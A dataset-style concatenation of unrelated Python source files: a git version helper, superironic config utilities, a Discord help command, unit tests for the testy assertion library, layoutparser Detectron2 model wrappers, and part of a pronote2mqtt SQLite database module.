# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '{}', no digits".format(",".join(refs-tags)))
if verbose:
print("likely tags: {}".format(",".join(sorted(tags))))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking {}".format(r))
return {"version": r,
"full": keywords["full"].strip()}
else:
if verbose:
print("no suitable tags, using full revision id")
return {"version": keywords["full"].strip(),
"full": keywords["full"].strip()}
def version_from_parentdir(parentdir_prefix, root, verbose=False):
# Source tarballs conventionally unpack into a directory that includes
# both the project name and a version string.
dirname = os.path.basename(root)
if not dirname.startswith(parentdir_prefix):
if verbose:
print("guessing rootdir is '{}', but '{}' doesn't start with "
"prefix '{}'".format(root, dirname, parentdir_prefix))
return None
version = dirname[len(parentdir_prefix):].split('-')[0]
return {"version": version, "full": ""}
def git2pep440(ver_str):
dash_count = ver_str.count('-')
if dash_count == 0:
return ver_str
elif dash_count == 1:
return ver_str.split('-')[0] + "+dirty"
elif dash_count == 2:
tag, commits, sha1 = ver_str.split('-')
return "{}.post0.dev{}+{}".format(tag, commits, sha1)
elif dash_count == 3:
tag, commits, sha1, _ = ver_str.split('-')
return "{}.post0.dev{}+{}.dirty".format(tag, commits, sha1)
else:
raise RuntimeError("Invalid version string")
def get_versions(verbose=False):
vcs_kwds = {"refnames": git_refnames, "full": git_full}
parentdir = package + '-'
root = __location__
# pkg_path is the relative path from the top of the source
# tree (where the .git directory might live) to this file.
# Invert this to find the root of our package.
for _ in pkg_path.split(os.sep):
root = os.path.dirname(root)
# different version retrieval methods as (method, args, comment)
ver_retrieval = [
(version_from_keywords, (vcs_kwds, tag_prefix, verbose),
'expanded keywords'),
(version_from_parentdir, (parentdir, root, verbose), 'parentdir'),
(version_from_git, (tag_prefix, root, verbose), 'git')
]
for method, args, comment in ver_retrieval:
ver = method(*args)
if ver:
if verbose:
print("got version from {}".format(comment))
break
else:
ver = {"version": "unknown", "full": ""}
ver['version'] = git2pep440(ver['version'])
return ver
``` |
{
"source": "jimrollenhagen/superironic",
"score": 2
} |
#### File: superironic/superironic/utils.py
```python
from superironic import colors
from superironic import config
def get_envs_in_group(group_name):
"""
Takes a group_name and finds any environments that have a SUPERIRONIC_GROUP
configuration line that matches the group_name.
"""
envs = []
for section in config.ironic_creds.sections():
if (config.ironic_creds.has_option(section, 'SUPERIRONIC_GROUP') and
config.ironic_creds.get(section,
'SUPERIRONIC_GROUP') == group_name):
envs.append(section)
return envs
def is_valid_environment(env):
"""Check if config file contains `env`."""
valid_envs = config.ironic_creds.sections()
return env in valid_envs
def is_valid_group(group_name):
"""
Checks to see if the configuration file contains a SUPERIRONIC_GROUP
configuration option.
"""
valid_groups = []
for section in config.ironic_creds.sections():
if config.ironic_creds.has_option(section, 'SUPERIRONIC_GROUP'):
valid_groups.append(config.ironic_creds.get(section,
'SUPERIRONIC_GROUP'))
valid_groups = list(set(valid_groups))
if group_name in valid_groups:
return True
else:
return False
def print_valid_envs(valid_envs):
"""Prints the available environments."""
print("[%s] Your valid environments are:" %
(colors.gwrap('Found environments')))
print("%r" % valid_envs)
def warn_missing_ironic_args():
"""Warn user about missing Ironic arguments."""
msg = """
[%s] No arguments were provided to pass along to ironic.
The superironic script expects to get commands structured like this:
superironic [environment] [command]
Here are some example commands that may help you get started:
superironic prod node-list
superironic prod node-show
superironic prod port-list
"""
print(msg % colors.rwrap('Missing arguments'))
def rm_prefix(name):
"""
Removes ironic_ os_ ironicclient_ prefix from string.
"""
if name.startswith('ironic_'):
return name[7:]
elif name.startswith('ironicclient_'):
return name[13:]
elif name.startswith('os_'):
return name[3:]
else:
return name
``` |
{
"source": "jimrpg00/steamkeys",
"score": 3
} |
#### File: jimrpg00/steamkeys/MyHelp.py
```python
import discord
from discord.ext import commands
class MyHelp(commands.HelpCommand):
def get_command_brief(self, command):
return command.short_doc or "Command is not documented."
def get_command_signature(self, command):
return '%s%s %s' % (self.clean_prefix, command.qualified_name, command.signature)
# !help
async def send_bot_help(self, mapping):
embed = discord.Embed(title="JimRPG Steam Key Depository - Commands")
for cog, commands in mapping.items():
command_signatures = [self.get_command_signature(c) for c in commands]
for co in commands:
print(co.brief)
cog_name = getattr(cog, "qualified_name", "No Category")
description = getattr(cog, "description", "No Description")
print(description)
brief = getattr(co, "brief", "This command is not documented")
embed.add_field(name=cog_name, value=f"{brief}\nUsage: {self.get_command_signature(co)}", inline=False)
# if command_signatures:
# print(cog)
# cog_name = getattr(cog, "qualified_name", "No Category")
# embed.add_field(name=cog_name, value="\n".join(command_signatures), inline=False)
channel = self.get_destination()
await channel.send(embed=embed)
# !help <command>
async def send_command_help(self, command):
await self.context.send("This is help command")
# !help <group>
async def send_group_help(self, group):
await self.context.send("This is help group")
# !help <cog>
async def send_cog_help(self, cog):
print(cog)
description = getattr(cog, "description", "No Description")
channel = self.get_destination()
await channel.send(f"{description}")
``` |
{
"source": "jimr/testy",
"score": 3
} |
#### File: testy/tests/test_assertions.py
```python
from __future__ import with_statement
import re
import unittest
from datetime import datetime
from testy.assertions import (
assert_raises, assert_raises_and_contains, assert_equal,
assert_almost_equal, assert_within_tolerance, assert_not_equal, assert_lt,
assert_lte, assert_gt, assert_gte, assert_in_range, assert_between,
assert_in, assert_not_in, assert_all_in, assert_starts_with,
assert_not_reached, assert_rows_equal, assert_length,
assert_is, assert_is_not, assert_all_match_regex, assert_match_regex,
assert_any_match_regex, assert_all_not_match_regex, assert_sets_equal,
assert_dicts_equal, assert_dict_subset, assert_subset, assert_list_prefix,
assert_sorted_equal, assert_isinstance, assert_datetimes_equal,
assert_exactly_one
)
class PositiveAssertionsTestCase(unittest.TestCase):
"""Test all assertions with the expectation of them all passing."""
def test_assert_raises(self):
with assert_raises(TypeError):
raise TypeError()
with assert_raises(Exception):
raise TypeError()
def raise_it():
raise Exception()
assert_raises(Exception, raise_it)
def test_assert_raises_and_contains(self):
def fail():
raise ValueError("choose one of the correct values")
assert_raises_and_contains(ValueError, "one of", fail)
def test_assert_equal(self):
assert_equal(1, 1)
assert_equal("abc", "abc")
assert_equal(self, self)
def test_assert_almost_equal(self):
assert_almost_equal(1, 1, 1)
assert_almost_equal(1, 1.01, 1)
assert_almost_equal(0.99, 1, 1)
assert_almost_equal(1, 1.001, 2)
def test_assert_within_tolerance(self):
assert_within_tolerance(5, 5.1, 0.2)
def test_assert_not_equal(self):
assert_not_equal(1, 2)
class A(object):
pass
assert_not_equal(A(), A())
def test_assert_lt(self):
assert_lt(1, 2)
assert_lt(1.0, 1.01)
assert_lt('a', 'b')
assert_lt(False, True)
def test_assert_lte(self):
assert_lte(1, 1)
assert_lte(1, 2)
assert_lte(1.0, 1.01)
assert_lte('a', 'b')
assert_lte(False, True)
assert_lte(False, False)
def test_assert_gt(self):
assert_gt(2, 1)
assert_gt(1.01, 1.0)
assert_gt('b', 'a')
assert_gt(True, False)
def test_assert_gte(self):
assert_gte(1, 1)
assert_gte(2, 1)
assert_gte(1.01, 1.0)
assert_gte('b', 'a')
assert_gte(True, False)
assert_gte(False, False)
def test_assert_in_range(self):
assert_in_range(3, 1, 5)
assert_in_range(3, 1, 3, inclusive=True)
def test_assert_between(self):
assert_between(1, 3, 5)
assert_between(1, 3, 3)
def test_assert_in(self):
assert_in(2, [1, 2, 3])
assert_in('b', 'abc')
def test_assert_not_in(self):
assert_not_in(1, [2, 3, 4])
assert_not_in('a', 'bcd')
def test_assert_all_in(self):
assert_all_in([2, 3, 4], [1, 2, 3, 4, 5, 6])
assert_all_in('bc1', 'abc123')
def test_assert_starts_with(self):
assert_starts_with([1, 2, 3, 4, 5, 6], [1, 2, 3])
assert_starts_with('abcdef', 'abc')
def test_assert_not_reached(self):
try:
assert_not_reached()
except AssertionError:
pass
def test_assert_rows_equal(self):
row1 = dict(a=1, b=2)
row2 = dict(b=2, a=1)
assert_rows_equal([row1, row2], [row2, row1])
row1 = [1, 2]
row2 = [3, 4]
assert_rows_equal([row1, row2], [row2, row1])
def test_assert_length(self):
assert_length('abc', 3)
def test_assert_is(self):
x = 3
y = x
assert_is(x, y)
x = 300
assert_is(x, 300)
assert_is(None, None)
from testy.aliases import eq
assert_is(eq, assert_equal)
def test_assert_is_not(self):
assert_is_not(assert_is, assert_is_not)
assert_is_not('abc', list('abc'))
l = [1, 2, 3]
assert_is_not(l, l[:])
def test_assert_all_match_regex(self):
values = [
'abc',
'123 abc def',
]
pattern = re.compile(r'\w+')
assert_all_match_regex(pattern, values)
def test_assert_match_regex(self):
pattern = re.compile(r'\w+')
assert_match_regex(pattern, 'abc 123')
def test_assert_any_match_regex(self):
values = [
'"$',
'abc',
'@#~',
]
pattern = re.compile(r'\w+')
assert_any_match_regex(pattern, values)
def test_assert_all_not_match_regex(self):
values = [
'"$',
'@#~',
]
pattern = re.compile(r'\w+')
assert_all_not_match_regex(pattern, values)
def test_assert_sets_equal(self):
s1 = set(['a', 'b', 'c', 1, 2, 3])
s2 = set([1, 'a', 3, 'b', 'c', 2])
assert_sets_equal(s1, s2)
def test_assert_dicts_equal(self):
d1 = dict(a=3, b=True, c=None)
d2 = dict(b=True, c=None, a=3)
assert_dicts_equal(d1, d2)
d1 = dict(a=3, b=True, c=None, d=4)
d2 = dict(b=True, c=None, a=3)
assert_dicts_equal(d1, d2, ignore_keys=['d'])
def test_assert_dict_subset(self):
d1 = dict(b=True)
d2 = dict(a=3, b=True, c=None)
assert_dict_subset(d1, d2)
def test_assert_subset(self):
s1 = set([3, 'b', 'c', 2])
s2 = set(['a', 'b', 'c', 1, 2, 3])
assert_subset(s1, s2)
def test_assert_list_prefix(self):
l1 = [1, 2, 3]
l2 = [1, 2, 3, 'a', 'b', 'c']
assert_list_prefix(l1, l2)
def test_assert_sorted_equal(self):
s1 = set(['a', 'b', 'c'])
s2 = set(['b', 'c', 'a'])
assert_sorted_equal(s1, s2)
def test_assert_isinstance(self):
class A(object):
pass
assert_isinstance(A(), A)
assert_isinstance(dict(a=1), dict)
def test_assert_datetimes_equal(self):
# times are compared to the millisecond, so this ought to pass
t0 = datetime.now()
t1 = datetime.now()
assert_datetimes_equal(t0, t1)
t0 = datetime(1970, 1, 1)
t1 = datetime(1970, 1, 1)
assert_datetimes_equal(t0, t1)
def test_assert_exactly_one(self):
assert_exactly_one(None, False, None, None)
assert_exactly_one(None, True, None, None)
class NegativeAssertionsTestCase(unittest.TestCase):
"""Test all assertions with the expectation of them all failing."""
def test_assert_raises(self):
class MyException(Exception):
pass
with assert_raises(AssertionError):
with assert_raises(TypeError):
raise MyException()
with assert_raises(AssertionError):
with assert_raises(Exception):
pass
def test_assert_raises_and_contains(self):
def no_fail():
return
def fail():
raise ValueError("choose one of the correct values")
with assert_raises(AssertionError):
assert_raises_and_contains(ValueError, "two of", fail)
with assert_raises(AssertionError):
assert_raises_and_contains(Exception, "anything", no_fail)
def test_assert_equal(self):
with assert_raises(AssertionError):
assert_equal(1, 2)
def test_assert_almost_equal(self):
with assert_raises(AssertionError):
assert_almost_equal(1, 1.01, 2)
def test_assert_within_tolerance(self):
with assert_raises(AssertionError):
assert_within_tolerance(5, 5.1, 0.01)
def test_assert_not_equal(self):
with assert_raises(AssertionError):
assert_not_equal(1, 1)
def test_assert_lt(self):
with assert_raises(AssertionError):
assert_lt(3, 2)
def test_assert_lte(self):
with assert_raises(AssertionError):
assert_lte(10, 1)
def test_assert_gt(self):
with assert_raises(AssertionError):
assert_gt(1, 4)
def test_assert_gte(self):
with assert_raises(AssertionError):
assert_gte(3, 5)
def test_assert_in_range(self):
with assert_raises(AssertionError):
assert_in_range(1, 2, 4)
def test_assert_between(self):
with assert_raises(AssertionError):
assert_between(1, 3, 2)
def test_assert_in(self):
with assert_raises(AssertionError):
assert_in('a', [1, 2, 3])
def test_assert_not_in(self):
with assert_raises(AssertionError):
assert_not_in(1, [1, 2, 3])
def test_assert_all_in(self):
with assert_raises(AssertionError):
assert_all_in([1, 2], [1, 3])
def test_assert_starts_with(self):
with assert_raises(AssertionError):
assert_starts_with('abc123', 'bc')
def test_assert_not_reached(self):
# The only way to test this assertion negatively is to not reach it :)
pass
def test_assert_rows_equal(self):
with assert_raises(AssertionError):
row1 = dict(a=1, b=2)
row2 = dict(b=3, a=1)
row3 = dict(b=1, a=1)
assert_rows_equal([row1, row2], [row2, row3])
def test_assert_length(self):
with assert_raises(AssertionError):
assert_length('abc', 4)
def test_assert_is(self):
with assert_raises(AssertionError):
assert_is(True, False)
def test_assert_is_not(self):
with assert_raises(AssertionError):
assert_is_not(True, True)
def test_assert_all_match_regex(self):
with assert_raises(AssertionError):
values = [
'$%`',
'123 abc def',
]
pattern = re.compile(r'\w+')
assert_all_match_regex(pattern, values)
def test_assert_match_regex(self):
with assert_raises(AssertionError):
pattern = re.compile(r'\w+')
assert_match_regex(pattern, '$')
def test_assert_any_match_regex(self):
with assert_raises(AssertionError):
values = [
'"$',
'@#~',
]
pattern = re.compile(r'\w+')
assert_any_match_regex(pattern, values)
def test_assert_all_not_match_regex(self):
with assert_raises(AssertionError):
values = [
'"$',
'abc',
'@#~',
]
pattern = re.compile(r'\w+')
assert_all_not_match_regex(pattern, values)
def test_assert_sets_equal(self):
with assert_raises(AssertionError):
assert_sets_equal(set([1, 2, 3]), set([1, 'b', 'c']))
def test_assert_dicts_equal(self):
class A(object):
pass
with assert_raises(AssertionError):
assert_dicts_equal(
dict(a=[1, 2], b=dict(c=1), c=A(), d=(1, 2, 3)),
dict(a=[1, 2, 3], b=dict(d=2), c=A(), d=(1, 2))
)
def test_assert_dict_subset(self):
with assert_raises(AssertionError):
assert_dict_subset(dict(a=2), dict(b=3))
def test_assert_subset(self):
with assert_raises(AssertionError):
assert_subset(set([1, 2, 3]), set([1, 2]))
def test_assert_list_prefix(self):
with assert_raises(AssertionError):
assert_list_prefix([1, 2, 3], [4, 5, 6])
def test_assert_sorted_equal(self):
with assert_raises(AssertionError):
assert_sorted_equal([1, 2, 3], [3, 2, 3])
def test_assert_isinstance(self):
with assert_raises(AssertionError):
assert_isinstance(dict(), list)
def test_assert_datetimes_equal(self):
with assert_raises(AssertionError):
assert_datetimes_equal(datetime(1970, 1, 1), datetime.now())
def test_assert_exactly_one(self):
with assert_raises(AssertionError):
assert_exactly_one(True, False, None, 1)
class FailureAssertionsTestCase(unittest.TestCase):
"""Throw garbage at assertions to trip them over."""
def test_assert_starts_with(self):
with assert_raises(TypeError):
assert_starts_with(False, 'abc123')
with assert_raises(TypeError):
assert_starts_with('abc123', False)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "Jim-Salmons/layout-parser",
"score": 3
} |
#### File: layoutparser/models/base_catalog.py
```python
from iopath.common.file_io import HTTPURLHandler
from iopath.common.file_io import PathManager as PathManagerBase
# A trick learned from https://github.com/facebookresearch/detectron2/blob/65faeb4779e4c142484deeece18dc958c5c9ad18/detectron2/utils/file_io.py#L3
class DropboxHandler(HTTPURLHandler):
"""
Supports download and file check for dropbox links
"""
def _get_supported_prefixes(self):
return ["https://www.dropbox.com"]
def _isfile(self, path):
return path in self.cache_map
PathManager = PathManagerBase()
PathManager.register_handler(DropboxHandler())
```
#### File: layoutparser/models/base_layoutmodel.py
```python
from abc import ABC, abstractmethod
import os
import importlib
class BaseLayoutModel(ABC):
@property
@abstractmethod
def DETECTOR_NAME(self):
pass
@abstractmethod
def detect(self):
pass
# Add lazy loading mechanisms for layout models, refer to
# layoutparser.ocr.BaseOCRAgent
# TODO: Build a metaclass for lazy module loader
@property
@abstractmethod
def DEPENDENCIES(self):
"""DEPENDENCIES lists all necessary dependencies for the class."""
pass
@property
@abstractmethod
def MODULES(self):
"""MODULES instructs how to import these necessary libraries."""
pass
@classmethod
def _import_module(cls):
for m in cls.MODULES:
if importlib.util.find_spec(m["module_path"]):
setattr(
cls, m["import_name"], importlib.import_module(m["module_path"])
)
else:
raise ModuleNotFoundError(
f"\n "
f"\nPlease install the following libraries to support the class {cls.__name__}:"
f"\n pip install {' '.join(cls.DEPENDENCIES)}"
f"\n "
)
def __new__(cls, *args, **kwargs):
cls._import_module()
return super().__new__(cls)
```
#### File: models/detectron2/layoutmodel.py
```python
from PIL import Image
import numpy as np
import torch
from .catalog import PathManager, LABEL_MAP_CATALOG
from ..base_layoutmodel import BaseLayoutModel
from ...elements import Rectangle, TextBlock, Layout
__all__ = ["Detectron2LayoutModel"]
class Detectron2LayoutModel(BaseLayoutModel):
"""Create a Detectron2-based Layout Detection Model
Args:
config_path (:obj:`str`):
The path to the configuration file.
model_path (:obj:`str`, None):
The path to the saved weights of the model.
If set, overwrite the weights in the configuration file.
Defaults to `None`.
label_map (:obj:`dict`, optional):
The map from the model prediction (ids) to real
word labels (strings). If the config is from one of the supported
datasets, Layout Parser will automatically initialize the label_map.
Defaults to `None`.
enforce_cpu(:obj:`bool`, optional):
When set to `True`, it will enforce using cpu even if it is on a CUDA
available device.
extra_config (:obj:`list`, optional):
Extra configuration passed to the Detectron2 model
configuration. The argument will be used in the `merge_from_list
<https://detectron2.readthedocs.io/modules/config.html
#detectron2.config.CfgNode.merge_from_list>`_ function.
Defaults to `[]`.
Examples::
>>> import layoutparser as lp
>>> model = lp.models.Detectron2LayoutModel('lp://HJDataset/faster_rcnn_R_50_FPN_3x/config')
>>> model.detect(image)
"""
DEPENDENCIES = ["detectron2"]
MODULES = [
{
"import_name": "_engine",
"module_path": "detectron2.engine",
},
{"import_name": "_config", "module_path": "detectron2.config"},
]
DETECTOR_NAME = "detectron2"
def __init__(
self,
config_path,
model_path=None,
label_map=None,
extra_config=[],
enforce_cpu=False,
):
if config_path.startswith("lp://") and label_map is None:
dataset_name = config_path.lstrip("lp://").split("/")[0]
label_map = LABEL_MAP_CATALOG[dataset_name]
if enforce_cpu:
extra_config.extend(["MODEL.DEVICE", "cpu"])
cfg = self._config.get_cfg()
config_path = self._reconstruct_path_with_detector_name(config_path)
config_path = PathManager.get_local_path(config_path)
cfg.merge_from_file(config_path)
cfg.merge_from_list(extra_config)
if model_path is not None:
model_path = self._reconstruct_path_with_detector_name(model_path)
cfg.MODEL.WEIGHTS = model_path
cfg.MODEL.DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
self.cfg = cfg
self.label_map = label_map
self._create_model()
def _reconstruct_path_with_detector_name(self, path: str) -> str:
"""This function will add the detector name (detectron2) into the
lp model config path to get the "canonical" model name.
For example, for a given config_path `lp://HJDataset/faster_rcnn_R_50_FPN_3x/config`,
it will transform it into `lp://detectron2/HJDataset/faster_rcnn_R_50_FPN_3x/config`.
However, if the config_path already contains the detector name, we won't change it.
This function is a general step to support multiple backends in the layout-parser
library.
Args:
path (str): The given input path that might or might not contain the detector name.
Returns:
str: a modified path that contains the detector name.
"""
if path.startswith("lp://"): # TODO: Move "lp://" to a constant
model_name = path[len("lp://") :]
model_name_segments = model_name.split("/")
if (
len(model_name_segments) == 3
and "detectron2" not in model_name_segments
):
return "lp://" + self.DETECTOR_NAME + "/" + path[len("lp://") :]
return path
def gather_output(self, outputs):
instance_pred = outputs["instances"].to("cpu")
layout = Layout()
scores = instance_pred.scores.tolist()
boxes = instance_pred.pred_boxes.tensor.tolist()
labels = instance_pred.pred_classes.tolist()
for score, box, label in zip(scores, boxes, labels):
x_1, y_1, x_2, y_2 = box
if self.label_map is not None:
label = self.label_map.get(label, label)
cur_block = TextBlock(
Rectangle(x_1, y_1, x_2, y_2), type=label, score=score
)
layout.append(cur_block)
return layout
def _create_model(self):
self.model = self._engine.DefaultPredictor(self.cfg)
def detect(self, image):
"""Detect the layout of a given image.
Args:
image (:obj:`np.ndarray` or `PIL.Image`): The input image to detect.
Returns:
:obj:`~layoutparser.Layout`: The detected layout of the input image
"""
# Convert PIL Image Input
if isinstance(image, Image.Image):
if image.mode != "RGB":
image = image.convert("RGB")
image = np.array(image)
outputs = self.model(image)
layout = self.gather_output(outputs)
return layout
``` |
{
"source": "jimsaye/pronote2mqtt",
"score": 2
} |
#### File: pronote2mqtt/app/database.py
```python
import sqlite3
import os
import logging
import datetime
import json
from dateutil.relativedelta import *
# Constants
DATABASE_NAME = "pronote2mqtt.db"
DATABASE_TIMEOUT = 10
DATABASE_DATE_FORMAT = "%Y-%m-%d"
DATABASE_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# Config constants
P2M_KEY = "p2m"
DB_KEY = "db"
LAST_EXEC_KEY = "last_exec_datetime"
# Convert datetime string to datetime
def _convertDate(dateString):
if dateString == None: return None
else:
myDateTime = datetime.datetime.strptime(dateString,DATABASE_DATE_FORMAT)
return myDateTime
def _convertDateTime(dateString):
if dateString == None:
return None
else:
myDateTime = datetime.datetime.strptime(dateString, DATABASE_DATETIME_FORMAT)
return myDateTime
# Class database
class Database:
# Constructor
def __init__(self,path):
self.con = None
self.cur = None
self.date = datetime.datetime.now().strftime('%Y-%m-%d')
self.p2mVersion = None
self.dbVersion = None
self.path = path
self.studentList = []
# Database initialization
def init(self,p2mVersion,dbVersion):
# Create table for configuration
logging.debug("Creation of config table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS config (
key TEXT NOT NULL
, value TEXT NOT NULL)''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_config_key
ON config (key)''')
## Create table of Students
logging.debug("Creation of Students table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS students (
sid TEXT
, fullname TEXT
, school TEXT
, class TEXT
, PRIMARY KEY (fullname))''')
## Create table of Periods
logging.debug("Creation of Period table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS periods (
pid TEXT
, studentname TEXT
, name TEXT
, start TEXT
, end TEXT
, PRIMARY KEY (studentname,name,start))''')
## Create table of grades
logging.debug("Creation of Grade table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS grades (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, gid TEXT
, studentname TEXT
, date TEXT
, subject TYPE TEXT
, grade TYPE TEXT
, out_of TYPE TEXT
, default_out_of TYPE TEXT
, coefficient TYPE TEXT
, average TYPE TEXT
, max TEXT
, min TEXT
, comment TYPE TEXT
, PRIMARY KEY (period_name,date,subject,comment))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_grades_date
ON grades (period_name,date,subject,comment)''')
## Create table of averages
## pronote does not supply an id used period-id
logging.debug("Creation of Averages table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS averages (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, studentname TEXT NOT NULL
, student TEXT
, class_average TEXT
, max TYPE TEXT
, min TYPE TEXT
, out_of TYPE TEXT
, default_out_of TYPE TEXT
, subject TYPE TEXT NOT NULL
, PRIMARY KEY(period_name,studentname,subject))''')
# using key on period id and evalid
logging.debug("Creation of Evaluations table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS evaluations (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, studentname TEXT
, eid TEXT NOT NULL
, name TEXT
, domain TEXT
, teacher TEXT
, coefficient TEXT
, description TEXT
, subject TEXT
, date TEXT
, aid TEXT
, acquisition_name TEXT
, acquisition_level TEXT
, acquisition_coefficient TEXT
, PRIMARY KEY(period_name,studentname,subject,date,aid))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_evaluations_aid
ON evaluations (period_name,studentname,subject,date,aid)''')
# using key on period id and evalid
logging.debug("Creation of Absences table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS absences (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, studentname TEXT
, abid TEXT NOT NULL
, from_date TEXT
, to_date TEXT
, justified TEXT
, hours TEXT
, days TEXT
, reasons TEXT
, PRIMARY KEY(period_name,studentname,from_date,reasons))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_absences_pidabid
ON absences (period_name,studentname,from_date,reasons)''')
# using key on period id and evalid
logging.debug("Creation of Lessons table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS lessons (
lid TEXT NOT NULL
, studentname TEXT NOT NULL
, lessonDateTime TEXT
, lessonStart TEXT
, lessonEnd TEXT
, lessonSubject TEXT
, lessonRoom TEXT
, lessonCanceled TEXT
, lessonStatus TEXT
, PRIMARY KEY(studentname,lessonDateTime,lessonSubject,lessonRoom, lessonCanceled))''')
# self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_lessons_lid
# ON lessons (studentname,lessonDateTime,LessonSubject, lessonStatus)''')
# using key on period id and evalid
logging.debug("Creation of Homework table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS homework (
hid TEXT NOT NULL
, studentname TEXT NOT NULL
, homeworkSubject TEXT
, homeworkDescription TEXT
, homeworkDone TEXT
, homeworkDate TEXT
, PRIMARY KEY(studentname,homeworkDate,homeworkSubject,homeworkDescription))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_homework_hid
ON homework (studentname,homeworkDate,homeworkSubject,homeworkDescription)''')
# Commit
self.commit()
# Update configuration values
logging.debug("Store configuration")
self.updateVersion(P2M_KEY, p2mVersion)
self.updateVersion(DB_KEY, dbVersion)
self.updateVersion(LAST_EXEC_KEY, datetime.datetime.now())
# Commit
self.commit()
# Check that table exists
def existsTable(self,name):
query = "SELECT count(name) FROM sqlite_master WHERE type='table' AND name=?"
queryResult = None
try:
self.cur.execute(query,[name])
queryResult = self.cur.fetchall()
if queryResult is not None and queryResult[0][0] == 1:
return True
else:
return False
except Exception as e:
logging.error("Error when checking table : %s",e)
return False
# Update version
def updateVersion(self,key,value):
if self.existsTable("config"):
query = "INSERT OR REPLACE INTO config(key,value) VALUES(?,?)"
try:
self.cur.execute(query, [key,value])
logging.debug("Version of key %s with value %s updated successfully !", key, value)
except Exception as e:
logging.error("Error when updating config table : %s",e)
# Get version
def getConfig(self, key):
query = "SELECT value FROM config WHERE key = ?"
queryResult = None
try:
self.cur.execute(query,[key])
queryResult = self.cur.fetchone()
if queryResult is not None:
return queryResult[0]
else:
return None
except Exception as e:
logging.warning("Error retrieving version of key %s in config table %s", key, e)
return queryResult
# Connexion to database
def connect(self,g2mVersion,dbVersion):
# Create directory if not exists
if not os.path.exists(self.path):
os.mkdir(self.path)
logging.debug("Directory %s created",self.path)
# Initialize database if not exists
if not os.path.exists(self.path + "/" + DATABASE_NAME):
logging.debug("Initialization of the SQLite database...")
self.con = sqlite3.connect(self.path + "/" + DATABASE_NAME, timeout=DATABASE_TIMEOUT)
self.cur = self.con.cursor()
self.init(g2mVersion,dbVersion)
else:
logging.debug("Connexion to database")
self.con = sqlite3.connect(self.path + "/" + DATABASE_NAME, timeout=DATABASE_TIMEOUT)
self.cur = self.con.cursor()
# Get measures statistics
def getGradesCount(self):
valueResult = {}
query = f"SELECT count(*), count(distinct period_start), count(distinct gid), min(period_start), max(period_start) FROM grades"
# to add to distinguish between students.....e.g. WHERE student = '{sid}'"
self.cur.execute(query)
queryResult = self.cur.fetchone()
if queryResult is not None:
if queryResult[0] is not None:
valueResult["rows"] = int(queryResult[0])
valueResult["dates"] = int(queryResult[1])
valueResult["gid"] = int(queryResult[2])
valueResult["minDate"] = queryResult[3]
valueResult["maxDate"] = queryResult[4]
return valueResult
# Re-initialize the database
def reInit(self,p2mVersion,dbVersion):
logging.debug("Reinitialization of the database.")
logging.debug("Drop configuration table")
self.cur.execute('''DROP TABLE IF EXISTS config''')
logging.debug("Drop Periods table")
self.cur.execute('''DROP TABLE IF EXISTS periods''')
logging.debug("Drop Grades table")
self.cur.execute('''DROP TABLE IF EXISTS grades''')
logging.debug("Drop Averages table")
self.cur.execute('''DROP TABLE IF EXISTS averages''')
logging.debug("Drop Evaluations table")
self.cur.execute('''DROP TABLE IF EXISTS evaluations''')
logging.debug("Drop Lessons table")
self.cur.execute('''DROP TABLE IF EXISTS lessons''')
logging.debug("Drop Homework table")
self.cur.execute('''DROP TABLE IF EXISTS homework''')
logging.debug("Drop Student table")
self.cur.execute('''DROP TABLE IF EXISTS students''')
logging.debug("Drop Absences table")
self.cur.execute('''DROP TABLE IF EXISTS absences''')
# Commit work
self.commit()
# Initialize tables
self.init(p2mVersion,dbVersion)
# Check if connected
def isConnected(self):
return self.cur
# Disconnect
def close(self):
logging.debug("Disconnexion of the database")
self.con.close()
# Commit work
def commit(self):
self.con.commit()
# Load
def load(self):
# Load Students
self._loadStudents()
#load Homework
for myStudent in self.studentList:
self._loadHomework(myStudent)
#load Evaluation
for myStudent in self.studentList:
self._loadEvaluationsShortList(myStudent)
#load Absence
for myStudent in self.studentList:
self._loadAbsenceShortList(myStudent)
#load Averages
for myStudent in self.studentList:
self._loadAverage(myStudent)
#load Grade
for myStudent in self.studentList:
self._loadGradesShortList(myStudent)
#load Lessons
for myStudent in self.studentList:
self._loadLessonsShortList(myStudent)
# Load students
def _loadStudents(self):
query = "SELECT * FROM students"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Student
for result in queryResult:
myStudent = Student(result)
self.studentList.append(myStudent)
# Load homework
def _loadHomework(self,student):
studentname=student.studentFullname
datestart = datetime.date.today().strftime("%Y/%m/%d")
